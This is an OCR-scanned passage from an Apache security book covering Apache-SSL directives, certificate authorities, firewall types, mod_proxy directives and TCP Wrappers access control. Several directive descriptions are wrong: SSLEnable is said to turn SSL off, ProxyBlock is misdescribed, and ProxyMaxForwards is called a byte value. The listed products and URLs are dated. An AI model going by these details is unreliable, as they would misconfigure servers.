The HTTPS_KEYSIZE environment variable specifies the session key 
size. 

The HTTPS_SECRETKEYSIZE environment variable specifies what 
secret key size is being used. 

SSLBanCipher is the reverse of SSLRequireCipher. For arguments, 
it takes a comma-delimited list of ciphers that the server will reject. 
Use the SSLCACertificateFile directive to specify a file that 
contains not one but several certificates. 

Use the SSLCACertificatePath directive to specify from what 
certificate authorities you'll accept a client's certificate. 

Use the SSLCacheServerPath directive to specify a path to the 
global cache server. (See the server documentation for more infor- 
mation.) 

Use the SSLCacheServerPort directive to specify a port for the 
cache server. (See the server documentation for more information.) 
Use the SSLCacheServerRunDir directive to specify the directory in 
which your cache server runs. (See the server documentation for 
more information.) 

Use the SSLCertificateFile directive to specify the location of 
your single certificate file (* . pem). 

Use the SSLCertificateKeyFile directive to specify the location of 
your private key file. 

Use the SSLDisable directive to turn off SSL. This is useful when 
you have multiple virtual hosts, and some need SSL and others 
don’t. 

Use the SSLEnable directive to turn off SSL. This is useful when you 
have multiple virtual hosts, and some need SSL and others don’t. 
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TABLE 15.4 Continued 


Field Significance 





SSLRequireCipher Use the SSLRequireCipher directive to specify a cipher or ciphers 
that a client must conform to transact. This is the reverse of 
SSLBanCipher. For arguments, it takes a comma-delimited list of 
ciphers that the server will accept. 

SSLVerifyClient Use the SSLVerifyClient directive to set your servers paranoia 
level. Levels run from 0 (no certificate at all required) to 3 (the 
client must present—at the least—a valid certificate). 





Summary on Apache-SSL 


Apache-SSL is not the only available SSL implementation, but it’s an excellent learn- 
ing tool. You can learn not only how to secure Web-based electronic commerce 
transactions, but because the SSLeay source is open, you can also see how various 
algorithms are used in authentication. 


NOTE 


Although SSL is the prevailing system for encrypting client-to-server interaction, other secure 
transaction standards and protocols exist. One is SET, Secure Electronic Transaction, a system 
sponsored by IBM, MasterCard, and Visa. SET (designed specifically for credit card transac- 
tions) emerged with much fanfare and has been a favorite of banks, credit card companies, 
and other large financial institutions. However, SET has not yet taken the Internet by storm 
and one reason is that in SET transactions, all participants know their trading partners’ identi- 
ties. (Each participant possesses a personal or business digital certificate.) But SET—from a 
consumer viewpoint—offers some advantages. Consumers are issued a wallet or a helper 
application that stores and transmits their verified identity and financial information to SET- 
enabled remote servers. In this respect, a SET transaction resembles the act of whipping out 
your wallet or pocketbook to pay for goods. Personally, | don’t like it, but depending on your 
field, SET could be a suitable electronic commerce solution for you. To learn more, find the 
full SET specification at http://www. setco.org/set_specifications.html. 





Certificate Authorities 


You can generate certificates from your server (as illustrated previously), but many 
people might be reticent to trust them. Hence, if you’re doing commerce online, 
consider purchasing a certificate from an established certificate authority, or an orga- 
nization whose sole purpose is to sell and authenticate certificates. 
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Certificates associate public cryptographic keys with individuals, companies, or 
machines. At a minimum, they store the following information: 


e Subject: Distinguished Name, Public Key 


e Issuer: Distinguished Name, Signature 


Period of Validity: Not Before Date, Not After Date 
Administrative Information: Version, Serial Number 


Extended Information: Basic Constraints, Client Flags 


Table 15.5 lists a few certificate authorities. 


TABLE 15.5 Certificate Authorities 





Authority Location 

128i Ltd. http: //www.128i.com 

BelSign NV/SA http: //www.belsign.be 

CertiSign Certificadora http: //www.certisign.com.br 

Certplus SA http: //www.certplus.com 

Deutsches Forschungsnetz http: //www.pca.dfn.de/dfnpca/certify/ss1/ 
Entrust.net Ltd. http: //www.entrust.net/products/index.htm 
GeoTrust Inc. http://www. freessl.com 

GlobalSign NV/SA http: //www.GlobalSign.net 

IKS GmbH http://www. iks-jena.de/produkte/ca/ 

KPN Telecom http://certificaat.kpn.com/ 

lanechange.net http://www. lanechange.net/#server certs 
NetLock Kft. http: //www.netlock.net 

register.com http: //commercelock.register.com 

TC TrustCenter http: //www.trustcenter.de/ 

Thawte Consulting http://www. thawte.com/ 

Verisign, Inc. http://www. verisign.com/guide/apache 





Commercial SSL Packages 


If you don’t want the hassle of dealing with compilation and basic maintenance of 
an open-source SSL implementation, Table 15.6 lists several commercial tools that 


offer hands-off SSL. 


WARNING 
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Watch it when purchasing commercial SSL packages. Many companies fold, leaving you with 
no support. The ones included in the following list are solid, but at least 36 “SSL solution 
providers” bottomed out. If yours is an enterprise situation, consider the heavy hitters (Cisco, 
3Com, Entrust, VeriSign, and so on). 





TABLE 15.6 Commercial SSL Packages 


Package 


Description 





CSM Proxy 


Entrust Toolkit 


Global Site Plus 


HP SpeedCard 


iD2 Personal 


Luna XL 


From Computer Software Manufaktur, CSM Proxy gateways your 
LAN. Connected to the router (or, heaven forbid, a modem), it 
handles all requests and implements NAT, user authentication, 
access control, virus scanning, and so on. Provides SSL tunnels. 
Check it out at http: //www.csm-usa.com/product/proxy/. 

From Entrust Technologies, Entrust’s SSL/TLS Toolkit for C++ isn’t 
an SSL implementation for your Web server, but rather a develop- 
ment tool suite. If you want to incorporate SSL easily into your 
applications (and your thing is C++), check it out at 

https: //www.entrust.com/developer/tls/index.htm. 

From VeriSign, Global Site Plus offers 128-bit SSL IDs, 40-bit SSL 
IDs, Payflow Pro, which enables your store to securely accept and 
process credit card, debit card, purchase card, and electronic 
checks. Check it out at http://www. verisign.com/products/ 
site/commerce/index.html. 

Another hardware-based solution, the SpeedCard line offloads SSL 
from Web servers and centers it in add-on hardware. Some 
versions support as many as 1,200 SSL connections per second. 
These solutions are pricey (about 27 grand) but powerful. Learn 
more at http: //www.hp.com/products1/servers/serverappli- 
ances/products/traffic_management_server_apps/. 

From iD2 Technologies, iD2 Personal (for Windows 95/98/NT and 
Macintosh) supports SSL and many other algorithms, and is meant 
for personal users. Check it out at http: //www.id2tech.com/prod- 
ucts/2d.html. 

Luna XL, a hardware-based solution, delivers high-performance SSL 
acceleration (especially useful for Web farms—plug it in and let it 
run). Currently supports Windows NT 4.0, Windows 2000, Solaris 7 
(32-bit and 64-bit), Solaris 8, Linux Redhat 6.2, and IIS 5.0, Apache 
1.3.17, and iPlanet Web Server 4.1. Check it out at 

http: //www.chrysalis-its.com/trusted_systems/luna_xl.htm. 
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TABLE 15.6 Continued 





Package 


Description 





Phaos SSLava 


SSP XBoard-1680 


Stronghold 3 


From Phaos Technology Corporation, Phaos SSLava offers SSL and 
TLS support via Java, X.509 v3 certificates, RSA, ARCFOUR/RC4, 
DES, 3DES, DSA, Diffie-Hellman PKCS #5, #8 and #12 for private 
key security, and so on. Most suitable for applets, client applica- 
tions, and server applications. Check it out at 

http: //www.phaos.com/e_security/prod_ssl.html. 

From SSP Solutions, SSP XBoard-1680 is an SSL-accelerator card 
that throws SSL work off on hardware, thus allowing your Web 
servers to perform the tasks they're most suited for. SSL bulk 
encryption with DES, 3DES, SHA-1, and MD5 and support for 
Netscape Enterprise Server, Apache, IIS, Winnt, and Solaris. Check 
it out at http: //www.sspsolutions.com/products/ 
sspxboard1680/features.php. 

Perhaps the most well-known standalone SSL implementation avail- 
able, StrongHold supports BSDI, FreeBSD, HP-UX, IRIX, Linux, 
NetBSD, OpenBSD, SCO, Solaris, SunOS, True64 Unix, and 
Unixware and runs PHP, mod_perl, and mod_ss1. From RedHat 
Software. Get it here: http://www. redhat .com/software/apache/ 
stronghold/index.html. 





Summary 


After throwing SSL on the fire, you might think you're finished securing your 
Apache sever. Not so. Your next step is to consider firewalls. That’s what Chapter 16, 
“Apache and Firewalls,” is all about. 


1 6 IN THIS CHAPTER 


e What Is a Firewall? 


Apache and Firewalls 


e Apache as a Proxy Server 


e tcpd: TCP Wrappers 


W ren you connect your host to the outside world, you e IP Filtering in Windows 
enter hostile territory. Innumerable nameless, faceless e The MMC IPSEC Policy 
attackers can probe your server 24 hours a day, seven days Snap-in 

week. To counter this, you need a firewall or a reasonable 

facsimile. That’s what this chapter is all about. e Commercial Firewalls 


What Is a Firewall? 


A firewall, at its most basic level, is a device that prevents 
outsiders from accessing restricted areas of your network. 

This is typically a router, a standalone computer running 

packet filtering or proxy software, or a firewall-in-a-box (a 
proprietary hardware device that filters and proxies). 


A firewall can serve as a single entry point to your site. As 
it receives connection requests, your firewall evaluates 
them. It authorizes connection requests only from autho- 
rized hosts; it discards the remaining connections. 


This definition is too narrow, however. Today’s firewalls 
perform many tasks, including 


e Packet filtering and analysis—Firewalls analyze 
incoming packets of multiple protocols. Based on 
that analysis, firewalls can perform conditional eval- 
uations. (“If this type of packet is encountered, I will 
do this.”) 


e Protocol or content blocking—Firewalls screen 
content. You can exploit this to block Java, 
JavaScript, VBScript, ActiveX, or cookies at the fire- 
wall. You can even create rules to block particular 
attack signatures. 
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NOTE 


Attack signatures are patterns common to a particular attack. For example, when a user 
Telnets to port 80 and issues command-line requests, this looks a certain way to your 
machine. By defining this behavior, you can teach your firewall to block such attacks. (You 
can also do this at a packet level. For example, some remote exploits generate specialized 
packets that are easily distinguished from other, nonmalicious packets. Your firewall can 
recognize, capture, and act on these.) 





e User, connection, and session authentication and encryption—Many firewalls 
support multiple algorithms and authentication schemes (including DES, Triple 
DES, SSL, IPSEC, SHA, MDS, BlowFish, IDEA, and so on) to verify users’ identi- 
ties, check session integrity, and shield transiting data from electronic eaves- 
dropping. 


So, firewalls (depending on their design) protect your network on at least two (and 
in some cases, all) of these levels: 

e Who can come in 

e What can come in 


e Where and how they come in 


In a more esoteric sense, a firewall, at its inception, is a concept rather than a 
product; it’s the sum of all rules you'll apply to your network. (Generally, you 
furnish your firewall with rules that mirror access policies in your organization.) 


Historically, two main firewall types existed: 
e Network-level firewalls or packet filters 
e Application gateways 


Today, most firewalls offer functionality that emulates both types. However, it’s 
worthwhile for our purposes here to examine the two separately. 


Network-Level Firewalls: Packet Filters 


Network-level firewalls are typically routers with packet filtering capabilities. Using a 
network-level firewall, you grant or deny access to your site based on 


e Source address 


e Protocol 


What Is a Firewall? 


e Port number 


e Content 


Router-based firewalls are perimeter solutions. That is, they’re external hardware 
devices and because all outside traffic must first pass through your router, you can 
harness the router to handle all accept-deny procedures in a wholesale manner. 


This offers a major advantage: Router-based firewalls are operating system and appli- 
cation-neutral. They offer a quick, clean solution that eliminates the need to tinker 
with individual workstations, services, or protocols. Also, more advanced router- 
based firewalls can defeat spoofing, block DoS attacks, and even render your network 
invisible to the outside world. 


Finally, routers offer an integrated solution. Because your network is permanently 
connected to the Internet, you’ll need a router anyway, so why not kill two birds 
with one stone? 


On the other hand, router-based firewalls have their deficiencies. Router perfor- 
mance, for example, can dramatically decline when you enforce excessively stringent 
filtering procedures. Also, good router-based firewalls are expensive and you get what 
you pay for. On-the-cheap systems sometimes don’t maintain packet-state and are 
therefore vulnerable to attacks on authentication and session integrity. 


Application-Proxy Firewalls/Application Gateways 


The other historical firewall type is the application-proxy firewall, or application 
gateway. Application gateways proxy connections between outside clients and your 
internal network. During such exchanges, a dialog occurs, with the gateway acting as 
a conduit and traffic cop. 


The advantage of this is that you have comprehensive and incisive control over each 
service and in many cases you can maintain packet-state information. 


However, application gateways have their deficiencies, too. One is they demand 
substantial involvement on your part because you must configure each network 
service (FTP, Telnet, HTTP, mail, news) separately. Additionally, inside users must use 
proxy-aware clients. If they don’t, they’ll have to adopt new policies and procedures. 


One example of an application-gateway firewall package is the Trusted Information 
Systems (TIS) Firewall Tool Kit (FWTK). The FWTK (which is free for noncommercial 
use) includes proxies for many services, including 


e Telnet 


e FTP 
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e rlogin 
e sendmail 


e HTTP 


The X Window System 


The FWTK demands that you not only proxy each application, but also apply access 
rules for each. This can get confusing. However, if you’re merely interested in how 
firewalls operate, and you don’t have a pressing need for an immediate, practical fire- 
wall solution, grab the FWTK and play with it. The experience you'll reap is well 
worth it. Get FWTK at http://www. fwtk.org. 


Apache as a Proxy Server 


You might not necessarily need a traditional or commercial firewall because Apache 
serves nicely as a proxy server. 


Apache proxies the following protocols: 
e FTP 
e HTTP 
e HTTPS 
e SOCKS 


If your network doesn’t require incoming Telnet or SSH traffic, and it otherwise 
meets the following requirements, Apache could save you time, trouble, and money. 


Consider the configuration depicted in Figure 16.1, which depicts a simple network 
connection. Many offices have similar configurations via DSL or cable. The chief 
difference here, however, is that this is a barebones connection. The bandwidth link 
runs directly into a hub that connects all internal machines. 


In this scenario, all machines are exposed or, in loose vernacular, they’re outside. 
Machines from the outside world can probe all four systems at will. This is highly 
undesirable. Figure 16.2 depicts a better alternative. 


In Figure 16.2, the internal workstations have reserved RFC 1918 addresses; addresses 
that the outside world cannot reach (routers drop such packets on contact). Apache, 
meanwhile, acting as the gateway, is the choke point, and must perform back- 
routing to internal systems (and the reverse for outgoing traffic). 
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FIGURE 16.1 A network connection. 
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FIGURE 16.2 A gateway protects internal machines. 
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In the next few sections, we’ll run through the steps required to establish such a 
configuration. 


mod_proxy 


mod_proxy, which you'll find in httpd-version/modules/proxy, provides Apache’s 
proxy capabilities, and sends requests through five phases: 


e Translation—Apache appends the proxy’s leading address to the requested file- 
name. 


e Mapping—Apache maps the request to the appropriate location. 


e File typing—Apache sets the type to PROXY_MAGIC_TYPE if filename begins with 
proxy. 


e URL-to-file mapping—Apache converts the URL stored in the filename to 
canonical form. 


e Request processing—Apache sends the request to a handler. 


Table 16.1 steps through the relevant mod_proxy functions. 


TABLE 16.1 mod_proxy Functions 





Function What Happens Here 

alias_match() Translates the URL into a filename. During this process, it steps 
through as many slash (/) characters as necessary until it finds 
the URL. 

proxy_detect() Double-checks that it does in fact have the entire URL. This accounts 


for situations where you previously specified that Apache should do 
something if it encounters a particular directory name (using 
ScriptAlias, for example). If not for this step, Apache would detect 
such a directory (in the URL path, but before the URL's end), trigger 
on that, and forge ahead with an incomplete request in hand. 


proxy_walk() Walks through <Proxy> entries. 

proxy_map_location() Bypasses core and mod_http map-to-storage steps and instead does its 
own mapping. 

proxy_fixup() This canonicalizes the URL. 

proxy_needsdomain() Checks whether the request contains a not-fully-qualified hostname. If 


so, it sends a redirect (and it appends the domain you specified with 
the ProxyDomain directive). 

proxy_handler() Invokes the handler. 

create_proxy_config() Loads all the configuration options including proxies, aliases, 
error_overrides, and maxforwards. (We'll look at those values via 
their directives in a moment.) 


TABLE 16.1 Continued 


Function 
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What Happens Here 





merge_proxy_config() 
add_pass() 
add_pass_reverse() 
set_allowed_ports() 
set_proxy_domain() 


set_proxy_req() 


set_max_forwards() 


Merges the aforementioned values. 

Handles ProxyPass directive specifications. 

Handles ProxyPassReverse directives. 

Loads allowed ports (the AllowCONNECT directive). 

Handles the default domain that the Apache proxy server will belong 
to (the ProxyDomain directive). 

Determines whether to append the host specified by ProxyPass or use 
the request’s host (the ProxyPass directive). 

Gets the maximum number of proxies through which a request might 
pass (the ProxyMaxForwards directive). 





mod_proxy Directives 


mod_proxy supports 14 directives: 


e AllowCONNECT 
e NoProxy 
e ProxyBlock 


e ProxyDomain 


e ProxyErrorOverride 


e ProxyMaxForwards 
e ProxyPass 
e ProxyPassReverse 


e ProxyPreserveHost 


e ProxyReceiveBufferSize 


e ProxyRemote 
e ProxyRequests 
e ProxyTimeout 


e ProxyVia 
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AllowCONNECT 

The AllowCONNECT directive specifies the ports on which the proxy CONNECT method 
can connect. Apache provides this functionality so you can specify ports other than 
the defaults (443 and 563). 


The syntax is 

AllowCONNECT number 

Here, number is the port number (or numbers) you specify. Specify port numbers in a 
white space—delimited list, such as this: 


AllowCONNECT porti port2 port3 


NoProxy 
The NoProxy directive specifies internal addresses (hostnames, IP addresses, and so 
on) for which no proxy is needed. This is to support intranet hosts. 


The syntax is 


NoProxy address-list 


Here, address -list signifies a space-delimited list of hosts, like this: 


NoProxy address1 address2 address3 


ProxyBlock 

The ProxyBlock directive offers you proxy network access control. It takes addresses 
as arguments (hostnames, IP addresses, and so on) that you want the proxy to block. 
It will refuse to serve requests coming from these addresses. 


The syntax is 


ProxyBlock address-list 


Here, address-list signifies a space-delimited list of addresses, such as this: 


ProxyBlock address? address2 address3 


WARNING 





Take care when formulating your blocking criteria. Even a partial match is sufficient for 
Apache to block the request (for example, “aol” would block everything from aol.com, 
users.aol.com, and so on). 
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ProxyDomain 

The ProxyDomain directive is for use in intranet environments. The proxy will 
append the hostname you specify here to any request that doesn’t specify a fully 
articulated domain name. 


The syntax is 

ProxyDomain domain 

The value domain here represents whatever domain name you specify. Note that you 
must precede this name with a dot, like this: 


-ourintranet.net 


ProxyErrorOverride 

The ProxyErrorOverride directive enables you to specify that in Server Side Include 
errors, the proxy returns related error information rather than sending the proxy 
error (which otherwise looks sloppy, reveals proxy information, and could confuse 
users). 


The syntax is 


ProxyErrorOverride on 
Here, on indicates that ProxyErrorOverride is enabled. 


ProxyMaxForwards 

The ProxyMaxForwards directive enables you to specify the maximum number of 
proxies through which a request might pass. This prevents bozos on the outside 
from draining resources by forcing a loop. 


The syntax is 


ProxyMaxForwards number 
Here, number represents a byte value. The default is 10. 


ProxyPass 

The ProxyPass directive enables you to specify which remote servers Apache will 
map into the local server’s space. Folks sometimes use ProxyPass to make Web 
servers behind firewalls (or on networks using IP masquerading) accessible to the 
outside world. 


The syntax is 


ProxyPass path url 
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Here, path is the local path, and url is the hostname or URL you want Apache to 
map that path to for outsiders. For example, relative to DocumentRoot: 


ProxyPass /development/ http://mydev.net 


This would map a request for http: //mine.com/development/docs to 
http: //mydev.net/development/docs. 


ProxyPassReverse 

The ProxyPassReverse directive enables Apache to manipulate URL Location, 
Content-Location, and URI headers on redirect responses (useful when you’re using a 
reverse proxy). 


The syntax is 
ProxyPassReverse path url 


Here, path is the local path, and url is the hostname or URL you want Apache to 
map that path to for outsiders. 


ProxyPreserveHost 
The ProxyPreserveHost directive, when enabled, passes the Host line from the 
incoming request to the proxied host. That is, it bypasses ProxyPass. 


The syntax is 


ProxyPreserveHost state 
Here, state is on or off. 


ProxyReceiveBufferSize 
The ProxyReceiveBufferSize directive enables you to specify a finite network buffer 
size for outgoing HTTP and FTP sessions. 


The syntax is 


ProxyReceiveBufferSize bytes 
Here, the bytes value signifies a number expressed in bytes. 
ProxyRemote 


The ProxyRemote directive enables you to specify remote proxies to the instant proxy 
(and what Apache should do with requests from the same). 
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The syntax is 
ProxyRemote pattern url 


Here, pattern is either a full or partial hostname pattern. url is the URL to which 
Apache should map such requests. 


ProxyRequests 
The ProxyRequests directive enables or disables Apache’s function as a forward 
proxy server. 


The syntax is 


ProxyRequests state 
Here, state is on or off. 


ProxyTimeout 
The ProxyTimeout directive lets you specify a timeout value after which proxy 
requests expire. 


The syntax is 


ProxyTimeout time 
Here, time is a value expressed in seconds. 


ProxyVia 

The ProxyVia directive controls what Apache does with Via headers. (Proxy servers 
update the Via header with various values, including their protocol and protocol 
version, hostname, port number, and comments. This is primarily for debugging 
purposes.) 


The syntax is 


ProxyVia state 


Here, state is one of four values: 
e block—Apache removes Via headers altogether. 
e full—Apache appends its current version in Via. 
e off—Apache ignores Via headers, which pass unaltered. 


e on—Apache appends Via values from the current host. 
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A Quick-Start Apache Proxy Server 


To quickly establish a simple Apache proxy server, first, recompile Apache with 
mod_proxy support if you didn’t do it previously: 


./configure --prefix=/usr/local/apache --enable-module=proxy 
make 
make install 


Next, specify in your configuration file that Apache should support proxying: 


LoadModule proxy_module libexec/libproxy.so 
AddModule mod_proxy 


Next, configure Apache to listen on a second port: 


Port 80 
Listen 80 
Listen 8080 


Then, set a minimal configuration: 


ProxyRequests On 

Order deny,allow 

Deny from all 

Allow from .yourdomain.net 

ProxyVia On 

CacheRoot "/usr/local/apache/proxy" 
CacheSize 409800 

CacheMaxExpire 100 
CacheDefaultExpire 60 


And finally, establish a virtual host for the proxy: 


<IfModule mod_proxy.c> 
Listen 192.168.172.1:8080 
<VirtualHost 192.168.172.1:8080> 
ProxyRequests on 
DocumentRoot /usr/local/apache/html 
</VirtualHost> 
</IfModule> 


This is a quick solution. You should experiment with the previous directives for a few 
hours until you get a feel for what you want or what your users need. 
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In general, you should use the previously described configuration for no more than a 
few machines at a time. That is, Apache, as a proxy server, is most useful in limited 
settings, such as where you use it for an extra security layer to hem in departments 
or divisions (see Figure 16.3). 
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FIGURE 16.3 Different Apache proxies serving different network segments. 


For this, Apache’s perfect. However, for larger systems—or more complicated or flexi- 
ble schemes—you might need additional network access control or even a full-blown 
firewall. 


Other Network Access Control Tools 


Perhaps you need more functionality than an Apache proxy server can offer—but 
still less than a full-fledged firewall. Tools of this ilk exist and of these, the most 
historically well established is TCP Wrappers, a Unix tool. 


tcpd: TCP Wrappers 


TCP Wrappers (by Wietse Venema) adds network access control through a simple but 
reliable mechanism. On hosts without TCP Wrappers, inetd starts at boot and 
checks for various servers in /etc/inetd.conf. Here’s a typical inetd. conf from such 
a host, minus comments: 
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# Internet server configuration database 

# $Revision: 1.66 $ 

ftp stream tcp nowait root /usr/etc/ftpd ftpd -1 
telnet stream tcp nowait root /usr/etc/telnetd telnetd 
shell stream tcp nowait root /usr/etc/rshd rshd 

login stream tcp nowait root /usr/etc/rlogind rlogind 


exec stream tcp nowait root /usr/etc/rexecd rexecd 

finger stream tcp nowait guest /usr/etc/fingerd fingerd 

http stream tcp nowait nobody ?/var/www/server/httpd httpd 
ntalk dgram udp wait root /usr/etc/talkd talkd 

tcpmux stream tcp nowait root internal 

echo stream tcp nowait root internal 


discard stream tcp nowait root internal 
chargen stream tcp nowait root internal 
daytime stream tcp nowait root internal 
time stream tcp nowait root internal 
echo dgram udp wait root internal 
discard dgram udp wait root internal 
chargen dgram udp wait root internal 
daytime dgram udp wait root internal 

time dgram udp wait root internal 


Each line specifies a service, its socket type, its protocol type, the user it runs as, and 
its server. For example, examine the entry for fingerd: 


finger stream tcp nowait guest /usr/etc/fingerd fingerd 


Here’s what the fingerd entry specifies: 
e The service is finger. 
e The socket type is STREAM. 
e The protocol is TCP. 


e The nowait directive indicates that inetd should spawn new fingerd processes 
as needed. 


e The quest directive indicates that fingerd should run as user quest. 


e The /usr/etc/fingerd directive indicates the location of the fingerd program. 


When inetd receives a request from a finger client, it starts an instance of fingerd, 
which then satisfies the finger request. The reason for this is because it’s easier to 
run a single daemon like inetd than to run 12 or 20 different servers. This way, a 
server only wakes if it’s actually needed. 
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The problem with this approach is that these services might not apply access control 
by default, and therefore, you cannot (easily) accept or deny connections selectively 
across the board. Enter TCP Wrappers. 


Venema created a generic wrapper (tcpd) that you can apply to all such services. 
With TCP Wrappers installed, when inetd calls a server, tcpd intercepts the call and 
evaluates the connection request. During this process, tcpd compares the connection 
request against various rules. If the connection request passes these tests, tcpd starts 
the requested server, which in turn satisfies the client’s request. But, if the connec- 
tion fails to pass tcpd’s evaluation, the system drops the connection. 


On most Unix distributions available today, TCP Wrappers is already installed. In 
such cases, your inetd.conf will look something like this: 


# 
# inetd.conf This file describes the services that will be available 
echo stream tcp  nowait root internal 


echo dgram udp wait root internal 

discard stream tcp nowait root internal 

discard dgram udp wait root internal 

daytime stream tcp nowait root internal 

daytime dgram udp = wait root internal 

chargen stream tcp nowait root internal 

chargen dgram udp wait root internal 

#time stream tcp nowait root internal 

#time  dgram udp = wait root internal 

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a 
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd 
gopher stream tcp nowait root /usr/sbin/tcpd gn 

#smtp stream tcp nowait root /usr/bin/smtpd smtpd 

#nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd 
shell stream tcp nowait root /usr/sbin/tcpd in.rshd 
login stream tcp nowait root /usr/sbin/tcpd in.rlogind 
exec stream tcp nowait root /usr/sbin/tcpd in.rexecd 
talk dgram udp = wait nobody.tty /usr/sbin/tcpd in.talkd 
ntalk dgram udp wait nobody.tty /usr/sbin/tcpd in.ntalkd 
pop2 stream tcp nowait root /usr/sbin/tcpd ipop2d 

pop3 stream tcp nowait root /usr/sbin/tcpd ipop3d 

imap stream tcp nowait root /usr/sbin/tcpd imapd 








Note the difference in inetd.conf entries when tcpd is installed: 


telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd 
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Here, the /usr/sbin/tcpd process precedes in.telnetd. Hence, telnetd is wrapped 
with tcpd. 


When tcpd evaluates a connection request, it also logs it ala syslog. As described in 
the documentation: 


The wrapper programs send their logging information to the syslog daemon (syslogd). The 
disposition of the wrapper logs is determined by the syslog configuration file (usually 
/etc/syslog.conf). Messages are written to files, to the console, or are forwarded to a 


@loghost. Some syslogd versions can even forward messages down a Ipipeline. 


So, TCP Wrappers affords you two powerful advantages: 
e Connection logging 


e Network access control 


The first is a freebie: tcpd logs the connections without your assistance. However, for 
network access control, you must establish the rules. 


TCP Wrappers and Network Access Control 


TCP Wrappers reads network access control rules from two files: 
e /etc/hosts.allow—In /etc/hosts.allow you specify authorized hosts 


e /etc/hosts.deny—In /etc/hosts.deny, you specify unauthorized hosts 


On a fresh installation, these files are generally empty and look like this: 


# hosts.deny This file describes the names of the hosts which are 


# *not* allowed to use the local INET services, as decided 
# by the '/usr/sbin/tcpd' server. 
# 


# The portmap line is redundant, but it is left to remind you that 
# the new secure portmap uses hosts.deny and hosts.allow. 

# In particular 

# you should know that NFS uses portmap! 


# hosts.deny This file describes the names of the hosts which are 
# *not* allowed to use the local INET services, as decided 
# by the '/usr/sbin/tcpd' server. 
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# The portmap line is redundant, but it is left to remind you that 
# the new secure portmap uses hosts.deny and hosts.allow. 

# In particular 

# you should know that NFS uses portmap! 


You must make the appropriate entries. Let’s look at some examples. 


Configuring /etc/hosts.deny and /etc/hosts.allow 

Configuring /etc/hosts.deny and /etc/hosts.allow requires some forethought. 
Venema developed a special language (hosts_options) for this purpose, which is 
documented in the hosts_options(5) manual page. As described in that document, 
hosts_options is 


...a simple access control language that is based on client (host name/address, username), 


and server (process name, host name/address) patterns. 


hosts_options supports many features and as you become more familiar with it, you 
can develop complex rules (“if a connection meets this criteria, execute this shell 
command”). For starters, however, until you get more experience, stick to the basics, 
which essentially amount to this: 


daemon_list : client_list 


For example, suppose you entered this line into /etc/hosts.allow: 


ALL: .mycompany.net EXCEPT techsupport.mycompany.net 


Here, all machines in domain mycompany.net except techsupport are allowed to 
connect to all services. This is useful, but only if you also add this entry to 
/etc/hosts.deny: 


ALL: ALL 


Here’s why: If you specify the /etc/hosts.allow entry alone, the only host being 
denied is techsupport.mycompany .net. 


As a rule, you should add ALL: ALL to your /etc/hosts.deny file first, which disal- 
lows everyone. From there, you can start adding authorized hosts. The reason for 
this is because it’s easier (and more secure) to specify that “that which is not permit- 
ted is denied,” than it is to specify that “that which is not denied is permitted.” This 
way, you account for unknown circumstances. 


388 


CHAPTER 16 Apache and Firewalls 


hosts_options also enables you to get into details. For example, assume that 
/etc/hosts.deny contains these entries: 


ALL: .aol.com, .msn.com 
ALL EXCEPT in.telnetd: techsupport.theircompany.net 


Here, folks from AOL and MSN are blocked, but folks on the host 
techsupport.theircompany.net can access your Telnet services. 


hosts_options Wildcards, Operators, and Shell Functions Recognizing that you 
might want to apply some sweeping rules, Venema also incorporated several wild- 
card statements into hosts_options. These are summarized in Table 16.2. 


TABLE 16.2 hosts_options Wildcards 
Wildcard What It Does 





ALL Use the ALL wildcard for sweeping generalizations, including ALL services and 
ALL remote hosts. Example: ALL: ALL in /etc/hosts.deny denies every host 
access to all services. (Conversely, ALL: ALL in /etc/hosts.allow allows all 
hosts to access all services—something you definitely don’t want to do). 


KNOWN Use the KNOWN wildcard when you want to apply a rule to users and hosts that 
are explicitly named in your access control rules. 

LOCAL Use the LOCAL wildcard for hostnames that have no dots in them (such as your 
localhost). 

PARANOID Use the PARANOID wildcard when you want tcpd to drop hosts when their host- 


name doesn’t match their address. 

UNKNOWN Use the UNKNOWN wildcard when you want to deny access to unknown hosts or 
usernames. (In other words, if these users and hosts are not explicitly named in 
your access control rules, they are denied access.) 


The EXCEPT Operator Finally, hosts_options supports one operator: EXCEPT. You 
can use EXCEPT to create exceptions to specific rules in either daemon or client lists. 
For example, suppose you entered this line in /etc/hosts.deny: 


ALL EXCEPT in.telnetd: techsupport.mycompany.net 
Here, you deny all services except Telnet to the host techsupport. But you can also 
stack EXCEPT declarations, like this: 


list EXCEPT list EXCEPT list 
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This alone (even without adding conditionally executed shell commands) can get 
complicated. Therefore, TCP Wrappers comes with tools that verify your rules: 


e tcpdchk—The TCP Wrappers configuration checker 


e tcpdmatch—The TCP Wrapper oracle 


Let’s cover those now. 


tcpdchk: The TCP Wrapper Configuration Checker 
tcpdchk is a tool that verifies your TCP Wrapper setup. As explained in the tcpdchk 
manual page: 


tcpdchk examines your TCP Wrapper configuration and reports all potential and real prob- 
lems it can find. The program examines the tcpd access control files (by default, these are 
/etc/hosts.allow and /etc/hosts.deny), and compares the entries in these files against 
entries in the inetd or tlid network configuration files. 


tcpdchk analyzes your configuration for the following problems: 
e Bad syntax 
e Bad pathnames 
e Bad hostnames or IP addresses 


e Hostnames that have IP addresses that don’t correspond to their hostname (an 
extension of the PARANOID wildcard functionality) 


e Services that you specify rules on, but aren’t actually wrapped by tcpd 


tcpdchk supports several command-line options, which Table 16.3 summarizes. 


TABLE 16.3 tcpdchk Command-Line Options 








Option What It Does 

-a Use the -a option to specify that tcpdchk should report on allow rules 
that aren't accompanied by an explicit ALLOW wildcard. 

-d Use the -d option to specify that tcpdchk should test rules on 


hosts.allow and hosts.deny in the current directory instead of /etc. 
(This is useful if you’re building rules in another directory before you actu- 
ally deploy them.) 

-i [inetd.conf] Use the -i option to specify an alternate inetd.conf. (tcpdchk needs to 
know which inetd.conf you're using—if not the default—because it tests 
whether services you have applied access control rules are actually 
wrapped.) 

-v Use the -v option to obtain verbose (and cleanly formatted) output. 
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tcpdmatch: The TCP Wrapper Oracle 

Whereas tcpdchk checks your rules to ensure that they’re sound, tcpdmatch actually 
shows you what will happen when they’re deployed. As explained in the tcpdmatch 
manual page: 


tcpdmatch predicts how the TCP Wrapper would handle a specific request for service. 


The syntax is tcpdmatch [daemon] [host], like this: 


tcpdmatch in.telnetd techsupport.theircompany.net 


Wrapping Up TCP Wrappers 


TCP Wrappers offers a close facsimile of firewall functionality, and it’s a good choice 
